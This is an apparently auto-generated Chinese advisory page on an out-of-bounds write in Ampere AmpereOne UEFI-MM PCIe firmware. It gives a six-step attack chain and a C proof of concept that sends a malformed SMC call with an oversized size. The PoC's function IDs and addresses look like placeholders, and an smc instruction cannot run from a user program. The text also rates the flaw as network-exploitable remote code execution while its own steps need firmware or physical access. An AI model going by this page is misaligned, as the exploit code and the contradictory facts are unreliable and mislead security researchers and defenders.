CVE-2025-62863: Ampere AmpereOne UEFI-MM PCIe驱动越界写入漏洞

漏洞信息

漏洞编号

CVE-2025-62863

漏洞类型

缓冲区溢出/越界写入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Ampere AmpereOne AC03, AmpereOne AC04, AmpereOne M

漏洞概述

CVE-2025-62863是影响Ampere AmpereOne系列处理器的严重安全漏洞。该漏洞存在于设备的UEFI-MM（UEFI Management Mode）PCIe驱动程序中，攻击者可以通过发送错误构造的SMC（Secure Monitor Call）调用来触发此漏洞。当SMC调用格式不正确时，会导致在PCIe驱动程序的S-EL0（Secure Exception Level 0）地址空间内发生缓冲区越界写入。成功利用此漏洞可实现远程代码执行，影响设备的机密性、完整性和可用性。由于该漏洞无需认证且可远程利用，CVSS评分高达9.8，属于严重级别。

技术细节

该漏洞的核心问题在于Ampere AmpereOne设备的UEFI-MM PCIe驱动程序缺乏对SMC调用的充分输入验证。SMC调用是ARM架构中用于在安全世界和普通世界之间通信的机制。当攻击者构造恶意的SMC请求时，驱动程序未能正确检查参数边界，导致写入操作超出预定缓冲区的范围。这种越界写入发生在S-EL0安全域中，可能被利用来覆盖关键的内存数据结构或劫持控制流。攻击者可以通过固件更新接口或物理接触设备的方式发送恶意SMC调用。成功利用后可获得系统级权限，执行任意代码。

攻击链分析

STEP 1

步骤1

攻击者识别目标设备为Ampere AmpereOne AC03/AC04/M系列处理器

STEP 2

步骤2

攻击者构造恶意格式错误的SMC调用请求，设置超大的size参数

STEP 3

步骤3

通过固件接口或物理接触方式向UEFI-MM PCIe驱动程序发送恶意SMC调用

STEP 4

步骤4

驱动程序缺乏输入验证，执行越界写入操作到S-EL0地址空间

STEP 5

步骤5

攻击者利用越界写入覆盖关键数据结构或劫持控制流

STEP 6

步骤6

成功获取系统级权限，执行任意代码，实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-62863 PoC - Malformed SMC Call Trigger
// This PoC demonstrates sending a malformed SMC call to trigger OOB write

#include <stdio.h>
#include <stdint.h>

// SMC Function IDs for Ampere AmpereOne
#define SMC_PCIE_CALL     0xC4000001
#define SMC_PCIE_WRITE    0xC4000002
#define SMC_PCIE_READ     0xC4000003

// Malformed SMC structure to trigger OOB write
struct malformed_smc {
    uint64_t func_id;      // Function ID
    uint64_t arg0;         // First argument (buffer pointer)
    uint64_t arg1;         // Second argument (size - maliciously large)
    uint64_t arg2;         // Third argument (destination address)
    uint64_t arg3;         // Fourth argument
};

// Trigger the vulnerability
void trigger_cve_2025_62863(void) {
    struct malformed_smc exploit_smc = {
        .func_id = SMC_PCIE_WRITE,
        .arg0 = 0x1000,           // Source buffer
        .arg1 = 0xFFFFFFFF,       // Oversized size (triggers OOB)
        .arg2 = 0x2000,           // Destination in S-EL0 space
        .arg3 = 0
    };
    
    // Execute malformed SMC call
    register uint64_t x0 asm("x0") = exploit_smc.func_id;
    register uint64_t x1 asm("x1") = exploit_smc.arg0;
    register uint64_t x2 asm("x2") = exploit_smc.arg1;
    register uint64_t x3 asm("x3") = exploit_smc.arg2;
    
    asm volatile("smc #0" : : "r"(x0), "r"(x1), "r"(x2), "r"(x3));
}

int main() {
    printf("CVE-2025-62863 PoC - Ampere AmpereOne SMC OOB Write\n");
    printf("Target: AmpereOne AC03/AC04/M devices\n");
    printf("Vulnerability: Malformed SMC call in UEFI-MM PCIe driver\n");
    trigger_cve_2025_62863();
    return 0;
}

影响范围

Ampere AmpereOne AC03 < 3.5.9.3

Ampere AmpereOne AC04 < 4.4.5.2

Ampere AmpereOne M < 5.4.5.1

防御指南

临时缓解措施

目前没有已知的临时缓解措施。建议立即应用官方提供的固件更新，升级到各产品线的安全版本。对于无法立即更新的系统，应限制设备的网络暴露，实施严格的访问控制，并监控异常的管理模式活动。